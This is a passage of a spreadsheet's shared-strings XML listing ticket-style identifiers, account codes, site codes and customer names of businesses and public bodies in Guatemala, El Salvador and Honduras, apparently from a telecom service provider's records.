    <t>F4593134</t>
  </si>
  <si>
    <t>F4593137</t>
  </si>
  <si>
    <t>F4593145</t>
  </si>
  <si>
    <t>F4593157</t>
  </si>
  <si>
    <t>F4593158</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM2295</t>
  </si>
  <si>
    <t>303500002T</t>
  </si>
  <si>
    <t>SERVICIOS INTEGRADOS DE CARGA Y LOGISTICA S.A.</t>
  </si>
  <si>
    <t>F4593169</t>
  </si>
  <si>
    <t>469800008T</t>
  </si>
  <si>
    <t>581700004T</t>
  </si>
  <si>
    <t>52900047T</t>
  </si>
  <si>
    <t>F4593192</t>
  </si>
  <si>
    <t>F4593193</t>
  </si>
  <si>
    <t>F4593194</t>
  </si>
  <si>
    <t>F4593197</t>
  </si>
  <si>
    <t>F4593199</t>
  </si>
  <si>
    <t>308500003T</t>
  </si>
  <si>
    <t>CONTR0001398216OC</t>
  </si>
  <si>
    <t>F4593218</t>
  </si>
  <si>
    <t>F4593220</t>
  </si>
  <si>
    <t>F4593221</t>
  </si>
  <si>
    <t>F4593223</t>
  </si>
  <si>
    <t>23476000SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL CUYULTITAN</t>
  </si>
  <si>
    <t>F4593240</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0899</t>
  </si>
  <si>
    <t>F4604265</t>
  </si>
  <si>
    <t>446100023T</t>
  </si>
  <si>
    <t>F4604285</t>
  </si>
  <si>
    <t>ALBA PETROLEOS DE EL SALVADOR S.E M DE C.V</t>
  </si>
  <si>
    <t>24012400SV</t>
  </si>
  <si>
    <t>367400027T</t>
  </si>
  <si>
    <t>F4604306</t>
  </si>
  <si>
    <t>F4604311</t>
  </si>
  <si>
    <t>90001904493T</t>
  </si>
  <si>
    <t>F4604335</t>
  </si>
  <si>
    <t>655100003T</t>
  </si>
  <si>
    <t>480300002T</t>
  </si>
  <si>
    <t>1608016OH</t>
  </si>
  <si>
    <t>OH1000553104/MEDICARD SA DATOS -</t>
  </si>
  <si>
    <t>F4604345</t>
  </si>
  <si>
    <t>890600002T</t>
  </si>
  <si>
    <t>BANCO CITIBANK DE GUATEMALA</t>
  </si>
  <si>
    <t>688331OH</t>
  </si>
  <si>
    <t>OH1000507408/PUMA ENERGY HONDURAS S A DE C V -</t>
  </si>
  <si>
    <t>F4604401</t>
  </si>
  <si>
    <t>F4604403</t>
  </si>
  <si>
    <t>F4604407</t>
  </si>
  <si>
    <t>F4604408</t>
  </si>
  <si>
    <t>F4569411</t>
  </si>
  <si>
    <t>F4569455</t>
  </si>
  <si>
    <t>F4569476</t>
  </si>
  <si>
    <t>F4569479</t>
  </si>
  <si>
    <t>F4569481</t>
  </si>
  <si>
    <t>F4569482</t>
  </si>
  <si>
    <t>F4569483</t>
  </si>
  <si>
    <t>F4569492</t>
  </si>
  <si>
    <t>F4569499</t>
  </si>
  <si>
    <t>F4569536</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM4193</t>
  </si>
  <si>
    <t>90001911296T</t>
  </si>
  <si>
    <t>F4611138</t>
  </si>
  <si>
    <t>F4611140</t>
  </si>
  <si>
    <t>BAJA COMPLETACION</t>
  </si>
  <si>
    <t>F4611147</t>
  </si>
  <si>
    <t>F4611156</t>
  </si>
  <si>
    <t>F4611158</t>
  </si>
  <si>
    <t>945100001T</t>
  </si>
  <si>
    <t>SOLUTEC</t>
  </si>
  <si>
    <t>F4611161</t>
  </si>
  <si>
    <t>F4611162</t>
  </si>
  <si>
    <t>F4611167</t>
  </si>
  <si>
    <t>F4611168</t>
  </si>
  <si>
    <t>90001906310T</t>
  </si>
  <si>
    <t>F4611180</t>
  </si>
  <si>
    <t>397200014T</t>
  </si>
  <si>
    <t>F4611187</t>
  </si>
  <si>
    <t>F4611197</t>
  </si>
  <si>
    <t>F4611203</t>
  </si>
  <si>
    <t>880900001T</t>
  </si>
  <si>
    <t>TELEFONICA INTERNATIONAL WHOLESALE SERVICES II .L.U.</t>
  </si>
  <si>
    <t>617800074T</t>
  </si>
  <si>
    <t>F4611209</t>
  </si>
  <si>
    <t>F4611214</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0484</t>
  </si>
  <si>
    <t>F4611217</t>
  </si>
  <si>
    <t>8901683T</t>
  </si>
  <si>
    <t>IP2178032SV</t>
  </si>
  <si>
    <t>ID1324001SV</t>
  </si>
  <si>
    <t>341800188T</t>
  </si>
  <si>
    <t>F4611260</t>
  </si>
  <si>
    <t>F4611262</t>
  </si>
  <si>
    <t>3280216ON</t>
  </si>
  <si>
    <t>F4611276</t>
  </si>
  <si>
    <t>F4611278</t>
  </si>
  <si>
    <t>F4617511</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_SAN_RAFAEL_PIE_DE_LA_CUESTA</t>
  </si>
  <si>
    <t>F4617512</t>
  </si>
  <si>
    <t>F4617519</t>
  </si>
  <si>
    <t>ID1028415SV</t>
  </si>
  <si>
    <t>AMERICAN APPAREL EL SALVADOR S.A. DE CV</t>
  </si>
  <si>
    <t>IP2027066SV</t>
  </si>
  <si>
    <t>F4617528</t>
  </si>
  <si>
    <t>F4617539</t>
  </si>
  <si>
    <t>90001908294T</t>
  </si>
  <si>
    <t>39200031T</t>
  </si>
  <si>
    <t>F4617546</t>
  </si>
  <si>
    <t>FEDERACION NACIONAL DE COOPERATIVAS DE AHORRO Y CREDITO Y SERVS VARIOS RL..</t>
  </si>
  <si>
    <t>F4617552</t>
  </si>
  <si>
    <t>F4617554</t>
  </si>
  <si>
    <t>F4617565</t>
  </si>
  <si>
    <t>897700001T</t>
  </si>
  <si>
    <t>DTI GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4617599</t>
  </si>
  <si>
    <t>F4617602</t>
  </si>
  <si>
    <t>F4617635</t>
  </si>
  <si>
    <t>F4617637</t>
  </si>
  <si>
    <t>F4617666</t>
  </si>
  <si>
    <t>459700007T</t>
  </si>
  <si>
    <t>F4579608</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_Z0_SANARATE_EL_PROGRESO_AG57</t>
  </si>
  <si>
    <t>459700006T</t>
  </si>
  <si>
    <t>748500001T</t>
  </si>
  <si>
    <t>LOGINSA</t>
  </si>
  <si>
    <t>F4579614</t>
  </si>
  <si>
    <t>F4579615</t>
  </si>
  <si>
    <t>F4579617</t>
  </si>
  <si>
    <t>CC_GYT_GT_INTERNET_AGENCIA_461</t>
  </si>
  <si>
    <t>F4579623</t>
  </si>
  <si>
    <t>8902242T</t>
  </si>
  <si>
    <t>F4579624</t>
  </si>
  <si>
    <t>1128539OH</t>
  </si>
  <si>
    <t>F4579682</t>
  </si>
  <si>
    <t>756500001T</t>
  </si>
  <si>
    <t>8200157T</t>
  </si>
  <si>
    <t>26710200SV</t>
  </si>
  <si>
    <t>F4553435</t>
  </si>
  <si>
    <t>872100001T</t>
  </si>
  <si>
    <t>TECNOLOGÍAS DE LA INFORMACION Y COMUNICACION</t>
  </si>
  <si>
    <t>8902206T</t>
  </si>
  <si>
    <t>F4553450</t>
  </si>
  <si>
    <t>671900181T</t>
  </si>
  <si>
    <t>549600001T</t>
  </si>
  <si>
    <t>LOGISTICA Y TRANSPORTES FRANCIS S.A.</t>
  </si>
  <si>
    <t>F4553460</t>
  </si>
  <si>
    <t>F4553490</t>
  </si>
  <si>
    <t>F4553495</t>
  </si>
  <si>
    <t>F4553500</t>
  </si>
  <si>
    <t>8901879T</t>
  </si>
  <si>
    <t>812094OH</t>
  </si>
  <si>
    <t>F4553526</t>
  </si>
  <si>
    <t>F4553531</t>
  </si>
  <si>
    <t>F4553533</t>
  </si>
  <si>
    <t>784000004T</t>
  </si>
  <si>
    <t>F4553538</t>
  </si>
  <si>
    <t>F4553540</t>
  </si>
  <si>
    <t>F4553543</t>
  </si>
  <si>
    <t>F4553556</t>
  </si>
  <si>
    <t>F4553568</t>
  </si>
  <si>
    <t>592900001T</t>
  </si>
  <si>
    <t>COMERCIAL MARITIMA SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4577551</t>
  </si>
  <si>
    <t>F4577552</t>
  </si>
  <si>
    <t>F4577558</t>
  </si>
  <si>
    <t>F4577574</t>
  </si>
  <si>
    <t>F4577582</t>
  </si>
  <si>
    <t>F4577587</t>
  </si>
  <si>
    <t>86100041T</t>
  </si>
  <si>
    <t>F4577606</t>
  </si>
  <si>
    <t>F4577609</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM4967</t>
  </si>
  <si>
    <t>F4577670</t>
  </si>
  <si>
    <t>F4577701</t>
  </si>
  <si>
    <t>F4577709</t>
  </si>
  <si>
    <t>F4600354</t>
  </si>
  <si>
    <t>535200014T</t>
  </si>
  <si>
    <t>F4600445</t>
  </si>
  <si>
    <t>47502911T</t>
  </si>
  <si>
    <t>F4567692</t>
  </si>
  <si>
    <t>IP2026339SV</t>
  </si>
  <si>
    <t>F4567701</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_AGENCIA_CENTRAL</t>
  </si>
  <si>
    <t>F4567703</t>
  </si>
  <si>
    <t>F4567706</t>
  </si>
  <si>
    <t>F4567707</t>
  </si>
  <si>
    <t>IPG003015SV</t>
  </si>
  <si>
    <t>F4567711</t>
  </si>
  <si>
    <t>F4567716</t>
  </si>
  <si>
    <t>F4567717</t>
  </si>
  <si>
    <t>IDG000544SV</t>
  </si>
  <si>
    <t>947200002T</t>
  </si>
  <si>
    <t>PLAN DE PRESTACIONES DEL EMPLEADO MUNICIPAL</t>
  </si>
  <si>
    <t>90001907660T</t>
  </si>
  <si>
    <t>455400001T</t>
  </si>
  <si>
    <t>GOBERNACION DEPARTAMENTAL DE CHIMALTENANGO</t>
  </si>
  <si>
    <t>F4567743</t>
  </si>
  <si>
    <t>F4567746</t>
  </si>
  <si>
    <t>F4567748</t>
  </si>
  <si>
    <t>ID1183032SV</t>
  </si>
  <si>
    <t>GRUPO MULTIACEROS S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4567753</t>
  </si>
  <si>
    <t>1010778OH</t>
  </si>
  <si>
    <t>F4567757</t>
  </si>
  <si>
    <t>F4567767</t>
  </si>
  <si>
    <t>F4567772</t>
  </si>
  <si>
    <t>F4567773</t>
  </si>
  <si>
    <t>F4567776</t>
  </si>
  <si>
    <t>F4567779</t>
  </si>
  <si>
    <t>IDG002480SV</t>
  </si>
  <si>
    <t>F4567785</t>
  </si>
  <si>
    <t>F4567786</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0368</t>
  </si>
  <si>
    <t>F4567789</t>
  </si>
  <si>
    <t>F4567808</t>
  </si>
  <si>
    <t>F4567810</t>
  </si>
  <si>
    <t>90001910209T</t>
  </si>
  <si>
    <t>F4567815</t>
  </si>
  <si>
    <t>1309149OH</t>
  </si>
  <si>
    <t>F4567824</t>
  </si>
  <si>
    <t>1269878OH</t>
  </si>
  <si>
    <t>F4567827</t>
  </si>
  <si>
    <t>F4567830</t>
  </si>
  <si>
    <t>F4567833</t>
  </si>
  <si>
    <t>F4593761</t>
  </si>
  <si>
    <t>F4593764</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4022</t>
  </si>
  <si>
    <t>F4593785</t>
  </si>
  <si>
    <t>F4593792</t>
  </si>
  <si>
    <t>296700028T</t>
  </si>
  <si>
    <t>F4593826</t>
  </si>
  <si>
    <t>F4593829</t>
  </si>
  <si>
    <t>F4593845</t>
  </si>
  <si>
    <t>F4593847</t>
  </si>
  <si>
    <t>F4593848</t>
  </si>
  <si>
    <t>F4593860</t>
  </si>
  <si>
    <t>F4593862</t>
  </si>
  <si>
    <t>331000172T</t>
  </si>
  <si>
    <t>821400002T</t>
  </si>
  <si>
    <t>ASSECO SOLUTIONS, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4593867</t>
  </si>
  <si>
    <t>F4593875</t>
  </si>
  <si>
    <t>333600027T</t>
  </si>
  <si>
    <t>90001907679T</t>
  </si>
  <si>
    <t>F4593887</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0036</t>
  </si>
  <si>
    <t>90001910103T</t>
  </si>
  <si>
    <t>452593ON</t>
  </si>
  <si>
    <t>F4604748</t>
  </si>
  <si>
    <t>F4604759</t>
  </si>
  <si>
    <t>F4604778</t>
  </si>
  <si>
    <t>727100076T</t>
  </si>
  <si>
    <t>F4604876</t>
  </si>
  <si>
    <t>F4604904</t>
  </si>
  <si>
    <t>8901721T</t>
  </si>
  <si>
    <t>F4604910</t>
  </si>
  <si>
    <t>F4573396</t>
  </si>
  <si>
    <t>F4573399</t>
  </si>
  <si>
    <t>F4573409</t>
  </si>
  <si>
    <t>F4573417</t>
  </si>
  <si>
    <t>F4573427</t>
  </si>
  <si>
    <t>770600050T</t>
  </si>
  <si>
    <t>F4573429</t>
  </si>
  <si>
    <t>F4573435</t>
  </si>
  <si>
    <t>F4573458</t>
  </si>
  <si>
    <t>F4573463</t>
  </si>
  <si>
    <t>F4573464</t>
  </si>
  <si>
    <t>F4573470</t>
  </si>
  <si>
    <t>F4573474</t>
  </si>
  <si>
    <t>F4573478</t>
  </si>
  <si>
    <t>F4573479</t>
  </si>
  <si>
    <t>F4573481</t>
  </si>
  <si>
    <t>F4573484</t>
  </si>
  <si>
    <t>F4573491</t>
  </si>
  <si>
    <t>F4573502</t>
  </si>
  <si>
    <t>F4573510</t>
  </si>
  <si>
    <t>F4573519</t>
  </si>
  <si>
    <t>F4611285</t>
  </si>
  <si>
    <t>F4611298</t>
  </si>
  <si>
    <t>824100001T</t>
  </si>
  <si>
    <t>PARAYAS, S.A.</t>
  </si>
  <si>
    <t>F4611307</t>
  </si>
  <si>
    <t>F4611329</t>
  </si>
  <si>
    <t>F4611349</t>
  </si>
  <si>
    <t>656300001T</t>
  </si>
  <si>
    <t>BI-SMS</t>
  </si>
  <si>
    <t>F4611352</t>
  </si>
  <si>
    <t>F4611362</t>
  </si>
  <si>
    <t>F4611379</t>
  </si>
  <si>
    <t>F4611392</t>
  </si>
  <si>
    <t>365700003T</t>
  </si>
  <si>
    <t>CRUZ ROJA GUATEMALTECA</t>
  </si>
  <si>
    <t>F4611422</t>
  </si>
  <si>
    <t>F4617844</t>
  </si>
  <si>
    <t>F4617847</t>
  </si>
  <si>
    <t>IP2099246SV</t>
  </si>
  <si>
    <t>F4617887</t>
  </si>
  <si>
    <t>F4617912</t>
  </si>
  <si>
    <t>829800063T</t>
  </si>
  <si>
    <t>F4617930</t>
  </si>
  <si>
    <t>F4617932</t>
  </si>
  <si>
    <t>F4579766</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM2026</t>
  </si>
  <si>
    <t>F4579861</t>
  </si>
  <si>
    <t>F4579883</t>
  </si>
  <si>
    <t>F4579917</t>
  </si>
  <si>
    <t>F4553577</t>
  </si>
  <si>
    <t>F4553579</t>
  </si>
  <si>
    <t>F4553581</t>
  </si>
  <si>
    <t>F4553582</t>
  </si>
  <si>
    <t>619700003T</t>
  </si>
  <si>
    <t>F4553598</t>
  </si>
  <si>
    <t>F4553665</t>
  </si>
  <si>
    <t>F4553669</t>
  </si>
  <si>
    <t>4985439ON</t>
  </si>
  <si>
    <t>F4553682</t>
  </si>
  <si>
    <t>F4553688</t>
  </si>
  <si>
    <t>F4553692</t>
  </si>
  <si>
    <t>F4553702</t>
  </si>
  <si>
    <t>F4553705</t>
  </si>
  <si>
    <t>F4553709</t>
  </si>
  <si>
    <t>F4553713</t>
  </si>
  <si>
    <t>23191600SV</t>
  </si>
  <si>
    <t>TERRACERIA SALVADORENA S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4553728</t>
  </si>
  <si>
    <t>F4577882</t>
  </si>
  <si>
    <t>F4577886</t>
  </si>
  <si>
    <t>ID1139005SV</t>
  </si>
  <si>
    <t>ASOC.COOP.DE APROV.AGROPECUARIO,AHORRO DE R.L.</t>
  </si>
  <si>
    <t>F4577895</t>
  </si>
  <si>
    <t>831900004T</t>
  </si>
  <si>
    <t>F4577903</t>
  </si>
  <si>
    <t>IP2145014SV</t>
  </si>
  <si>
    <t>F4577911</t>
  </si>
  <si>
    <t>F4577913</t>
  </si>
  <si>
    <t>F4577914</t>
  </si>
  <si>
    <t>F4577922</t>
  </si>
  <si>
    <t>F4577923</t>
  </si>
  <si>
    <t>90001908643T</t>
  </si>
  <si>
    <t>F4577936</t>
  </si>
  <si>
    <t>F4577941</t>
  </si>
  <si>
    <t>F4577944</t>
  </si>
  <si>
    <t>F4577949</t>
  </si>
  <si>
    <t>F4577962</t>
  </si>
  <si>
    <t>1641359OH</t>
  </si>
  <si>
    <t>24612400SV</t>
  </si>
  <si>
    <t>S.A DE C.V. INVERSIONES ANTHONY'S</t>
  </si>
  <si>
    <t>F4577972</t>
  </si>
  <si>
    <t>396700001T</t>
  </si>
  <si>
    <t>CENTRO COMERCIAL METRONORTE</t>
  </si>
  <si>
    <t>F4577976</t>
  </si>
  <si>
    <t>F4577977</t>
  </si>
  <si>
    <t>F4577980</t>
  </si>
  <si>
    <t>F4577991</t>
  </si>
  <si>
    <t>F4577998</t>
  </si>
  <si>
    <t>F4577999</t>
  </si>
  <si>
    <t>62900025T</t>
  </si>
  <si>
    <t>F4578005</t>
  </si>
  <si>
    <t>F4578007</t>
  </si>
  <si>
    <t>F4578012</t>
  </si>
  <si>
    <t>F4578015</t>
  </si>
  <si>
    <t>F4578016</t>
  </si>
  <si>
    <t>F4578020</t>
  </si>
  <si>
    <t>F4578023</t>
  </si>
  <si>
    <t>F4578029</t>
  </si>
  <si>
    <t>F4600871</t>
  </si>
  <si>
    <t>22407200SV</t>
  </si>
  <si>
    <t>1673646OH</t>
  </si>
  <si>
    <t>F4600883</t>
  </si>
  <si>
    <t>331000176T</t>
  </si>
  <si>
    <t>F4600893</t>
  </si>
  <si>
    <t>607100013T</t>
  </si>
  <si>
    <t>F4600897</t>
  </si>
  <si>
    <t>F4600916</t>
  </si>
  <si>
    <t>778300001T</t>
  </si>
  <si>
    <t>90001906432T</t>
  </si>
  <si>
    <t>26457000SV</t>
  </si>
  <si>
    <t>ASOC. DE DESARROLLO ECONOMICO LOCAL DE MORAZAN</t>
  </si>
  <si>
    <t>F4600957</t>
  </si>
  <si>
    <t>F4600958</t>
  </si>
  <si>
    <t>F4600960</t>
  </si>
  <si>
    <t>F4600961</t>
  </si>
  <si>
    <t>F4600962</t>
  </si>
  <si>
    <t>F4600972</t>
  </si>
  <si>
    <t>ID1037145SV</t>
  </si>
  <si>
    <t>DISTRIBUIDORA MARANATHA S.A DE C.V.</t>
  </si>
  <si>
    <t>90001800475T</t>
  </si>
  <si>
    <t>90001909418T</t>
  </si>
  <si>
    <t>F4601000</t>
  </si>
  <si>
    <t>665988OH</t>
  </si>
  <si>
    <t>OH1000606754/SALVAVIDAS HONDURAS FIRE PROTECTION -</t>
  </si>
  <si>
    <t>F4601006</t>
  </si>
  <si>
    <t>F4601007</t>
  </si>
  <si>
    <t>25918200SV</t>
  </si>
  <si>
    <t>22314800SV</t>
  </si>
  <si>
    <t>F4601016</t>
  </si>
  <si>
    <t>25270100SV</t>
  </si>
  <si>
    <t>F4601019</t>
  </si>
  <si>
    <t>25917000SV</t>
  </si>
  <si>
    <t>F4570984</t>
  </si>
  <si>
    <t>F4570992</t>
  </si>
  <si>
    <t>F4570994</t>
  </si>
  <si>
    <t>17400143T</t>
  </si>
  <si>
    <t>IP2098014SV</t>
  </si>
  <si>
    <t>F4571065</t>
  </si>
  <si>
    <t>F4571068</t>
  </si>
  <si>
    <t>919100001T</t>
  </si>
  <si>
    <t>CANO GROUP, S.A.</t>
  </si>
  <si>
    <t>F4571074</t>
  </si>
  <si>
    <t>F4571084</t>
  </si>
  <si>
    <t>F4571090</t>
  </si>
  <si>
    <t>F4571093</t>
  </si>
  <si>
    <t>822633OH</t>
  </si>
  <si>
    <t>F4571104</t>
  </si>
  <si>
    <t>805984</t>
  </si>
  <si>
    <t>F4571113</t>
  </si>
  <si>
    <t>F4571119</t>
  </si>
  <si>
    <t>880600002T</t>
  </si>
  <si>
    <t>1650726OH</t>
  </si>
  <si>
    <t>OH1001055064</t>
  </si>
  <si>
    <t>F4571135</t>
  </si>
  <si>
    <t>321700005T</t>
  </si>
  <si>
    <t>F4594334</t>
  </si>
  <si>
    <t>F4594336</t>
  </si>
  <si>
    <t>F4594340</t>
  </si>
  <si>
    <t>367400035T</t>
  </si>
  <si>
    <t>F4594349</t>
  </si>
  <si>
    <t>F4594356</t>
  </si>
  <si>
    <t>F4594357</t>
  </si>
  <si>
    <t>406400042T</t>
  </si>
  <si>
    <t>F4594361</t>
  </si>
  <si>
    <t>758500298T</t>
  </si>
  <si>
    <t>ID1038243SV</t>
  </si>
  <si>
    <t>VILMA SONIA RIVERA DE GUEVARA</t>
  </si>
  <si>
    <t>F4594384</t>
  </si>
  <si>
    <t>F4594400</t>
  </si>
  <si>
    <t>F4594401</t>
  </si>
  <si>
    <t>F4594404</t>
  </si>
  <si>
    <t>901900001T</t>
  </si>
  <si>
    <t>TISCALI, SOCIEDAD ANONIMA.</t>
  </si>
  <si>
    <t>F4594412</t>
  </si>
  <si>
    <t>25211700SV</t>
  </si>
  <si>
    <t>SUSUMO S.A DE C.V</t>
  </si>
  <si>
    <t>F4594421</t>
  </si>
  <si>
    <t>CONTR0001875644OC</t>
  </si>
  <si>
    <t>F4594435</t>
  </si>
  <si>
    <t>F4594436</t>
  </si>
  <si>
    <t>F4594437</t>
  </si>
  <si>
    <t>F4594438</t>
  </si>
  <si>
    <t>681645OH</t>
  </si>
  <si>
    <t>OH1000140492/AIG TGU -</t>
  </si>
  <si>
    <t>28100076T</t>
  </si>
  <si>
    <t>F4607112</t>
  </si>
  <si>
    <t>727100013T</t>
  </si>
  <si>
    <t>727100038T</t>
  </si>
  <si>
    <t>727100120T</t>
  </si>
  <si>
    <t>727100027T</t>
  </si>
  <si>
    <t>F4607145</t>
  </si>
  <si>
    <t>826637OC</t>
  </si>
  <si>
    <t>F4607163</t>
  </si>
  <si>
    <t>F4607177</t>
  </si>
  <si>
    <t>F4607179</t>
  </si>
  <si>
    <t>F4607181</t>
  </si>
  <si>
    <t>F4607190</t>
  </si>
  <si>
    <t>F4607199</t>
  </si>
  <si>
    <t>F4607200</t>
  </si>
  <si>
    <t>310100003T</t>
  </si>
  <si>
    <t>AVICOLA VILLALOBOS S.A.</t>
  </si>
  <si>
    <t>F4607211</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM1494</t>
  </si>
  <si>
    <t>F4607227</t>
  </si>
  <si>
    <t>F4607234</t>
  </si>
  <si>
    <t>F4536137</t>
  </si>
  <si>
    <t>F4575842</t>
  </si>
  <si>
    <t>361700042T</t>
  </si>
  <si>
    <t>F4575849</t>
  </si>
  <si>
    <t>F4575850</t>
  </si>
  <si>
    <t>F4575852</t>
  </si>
  <si>
    <t>ID1204061SV</t>
  </si>
  <si>
    <t>F4575855</t>
  </si>
  <si>
    <t>IP2172029SV</t>
  </si>
  <si>
    <t>F4575862</t>
  </si>
  <si>
    <t>F4575866</t>
  </si>
  <si>
    <t>F4575897</t>
  </si>
  <si>
    <t>ID1141036SV</t>
  </si>
  <si>
    <t>618400003T</t>
  </si>
  <si>
    <t>VIVERO BOTANIK, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4575920</t>
  </si>
  <si>
    <t>F4575922</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC000741</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_TIENDA_021</t>
  </si>
  <si>
    <t>F4575944</t>
  </si>
  <si>
    <t>47503204T</t>
  </si>
  <si>
    <t>F4575948</t>
  </si>
  <si>
    <t>F4575953</t>
  </si>
  <si>
    <t>90001911073T</t>
  </si>
  <si>
    <t>F4575974</t>
  </si>
  <si>
    <t>F4575976</t>
  </si>
  <si>
    <t>F4575977</t>
  </si>
  <si>
    <t>F4575978</t>
  </si>
  <si>
    <t>392100080T</t>
  </si>
  <si>
    <t>F4611961</t>
  </si>
  <si>
    <t>F4611963</t>
  </si>
  <si>
    <t>F4611976</t>
  </si>
  <si>
    <t>F4611977</t>
  </si>
  <si>
    <t>F4611990</t>
  </si>
  <si>
    <t>IP2035064SV</t>
  </si>
  <si>
    <t>767656OH</t>
  </si>
  <si>
    <t>F4612029</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_4170</t>
  </si>
  <si>
    <t>910400068T</t>
  </si>
  <si>
    <t>F4612036</t>
  </si>
  <si>
    <t>F4612038</t>
  </si>
  <si>
    <t>297400680T</t>
  </si>
  <si>
    <t>22413300SV</t>
  </si>
  <si>
    <t>CUSCATLAN LOGISTICS S.A. DE C.V.</t>
  </si>
  <si>
    <t>519341OH</t>
  </si>
  <si>
    <t>806300470T</t>
  </si>
  <si>
    <t>F4612048</t>
  </si>
  <si>
    <t>F4612053</t>
  </si>
  <si>
    <t>90001904202T</t>
  </si>
  <si>
    <t>47500798T</t>
  </si>
  <si>
    <t>F4612093</t>
  </si>
  <si>
    <t>F4612098</t>
  </si>
  <si>
    <t>26657100SV</t>
  </si>
  <si>
    <t>22348300SV</t>
  </si>
  <si>
    <t>F4618224</t>
  </si>
  <si>
    <t>90001900923T</t>
  </si>
  <si>
    <t>F4618243</t>
  </si>
  <si>
    <t>F4618254</t>
  </si>
  <si>
    <t>F4618261</t>
  </si>
  <si>
    <t>F4618277</t>
  </si>
  <si>
    <t>ID1099114SV</t>
  </si>
  <si>
    <t>90001908419T</t>
  </si>
  <si>
    <t>297400864T</t>
  </si>
  <si>
    <t>F4618306</t>
  </si>
  <si>
    <t>361700090T</t>
  </si>
  <si>
    <t>F4618316</t>
  </si>
  <si>
    <t>F4618328</t>
  </si>
  <si>
    <t>400000018T</t>
  </si>
  <si>
    <t>F4618337</t>
  </si>
  <si>
    <t>758500047T</t>
  </si>
  <si>
    <t>F4618340</t>
  </si>
  <si>
    <t>948300186T</t>
  </si>
  <si>
    <t>TRIBUNAL SUPREMO ELECTORAL..</t>
  </si>
  <si>
    <t>432800047T</t>
  </si>
  <si>
    <t>F4618348</t>
  </si>
  <si>
    <t>F4618350</t>
  </si>
  <si>
    <t>F4618353</t>
  </si>
  <si>
    <t>904000001T</t>
  </si>
  <si>
    <t>L'ESPERANCE, PEREZ, PINEDA, TOLEDO, SOCIEDAD CIVIL</t>
  </si>
  <si>
    <t>F4618355</t>
  </si>
  <si>
    <t>F4618358</t>
  </si>
  <si>
    <t>F4585696</t>
  </si>
  <si>
    <t>F4585702</t>
  </si>
  <si>
    <t>629100056T</t>
  </si>
  <si>
    <t>ID1028233SV</t>
  </si>
  <si>
    <t>STREAM GLOBAL SERVICES EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4585724</t>
  </si>
  <si>
    <t>F4585732</t>
  </si>
  <si>
    <t>F4585735</t>
  </si>
  <si>
    <t>F4585741</t>
  </si>
  <si>
    <t>4604659ON</t>
  </si>
  <si>
    <t>F4585765</t>
  </si>
  <si>
    <t>F4585767</t>
  </si>
  <si>
    <t>763452OH</t>
  </si>
  <si>
    <t>F4585771</t>
  </si>
  <si>
    <t>22969200SV</t>
  </si>
  <si>
    <t>TELEVISORES ARGUETA S.A.DE C.V.</t>
  </si>
  <si>
    <t>F4585779</t>
  </si>
  <si>
    <t>F4585780</t>
  </si>
  <si>
    <t>8900788T</t>
  </si>
  <si>
    <t>F4585785</t>
  </si>
  <si>
    <t>F4585786</t>
  </si>
  <si>
    <t>F4585787</t>
  </si>
  <si>
    <t>F4585792</t>
  </si>
  <si>
    <t>317500033T</t>
  </si>
  <si>
    <t>ID1383073SV</t>
  </si>
  <si>
    <t>METALURGICA SARTI S.A. DE C.V.</t>
  </si>
  <si>
    <t>8900792T</t>
  </si>
  <si>
    <t>F4585796</t>
  </si>
  <si>
    <t>F4585806</t>
  </si>
  <si>
    <t>331000078T</t>
  </si>
  <si>
    <t>F4585812</t>
  </si>
  <si>
    <t>607100008T</t>
  </si>
  <si>
    <t>F4585825</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_BARRIO_CARCHA</t>
  </si>
  <si>
    <t>F4535040</t>
  </si>
  <si>
    <t>F4556549</t>
  </si>
  <si>
    <t>344400300T</t>
  </si>
  <si>
    <t>672400026T</t>
  </si>
  <si>
    <t>5800013T</t>
  </si>
  <si>
    <t>F4556608</t>
  </si>
  <si>
    <t>F4556609</t>
  </si>
  <si>
    <t>787700016T</t>
  </si>
  <si>
    <t>F4556628</t>
  </si>
  <si>
    <t>F4556632</t>
  </si>
  <si>
    <t>F4578753</t>
  </si>
  <si>
    <t>F4578754</t>
  </si>
  <si>
    <t>F4578775</t>
  </si>
  <si>
    <t>F4578786</t>
  </si>
  <si>
    <t>F4578795</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM1440</t>
  </si>
  <si>
    <t>F4578796</t>
  </si>
  <si>
    <t>F4578801</t>
  </si>
  <si>
    <t>F4578818</t>
  </si>
  <si>
    <t>F4578827</t>
  </si>
  <si>
    <t>F4578839</t>
  </si>
  <si>
    <t>F4578847</t>
  </si>
  <si>
    <t>F4578848</t>
  </si>
  <si>
    <t>F4578863</t>
  </si>
  <si>
    <t>F4578865</t>
  </si>
  <si>
    <t>F4578874</t>
  </si>
  <si>
    <t>F4578879</t>
  </si>
  <si>
    <t>F4578887</t>
  </si>
  <si>
    <t>5800036T</t>
  </si>
  <si>
    <t>F4578904</t>
  </si>
  <si>
    <t>840000005T</t>
  </si>
  <si>
    <t>NESTLE GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4601023</t>
  </si>
  <si>
    <t>F4601024</t>
  </si>
  <si>
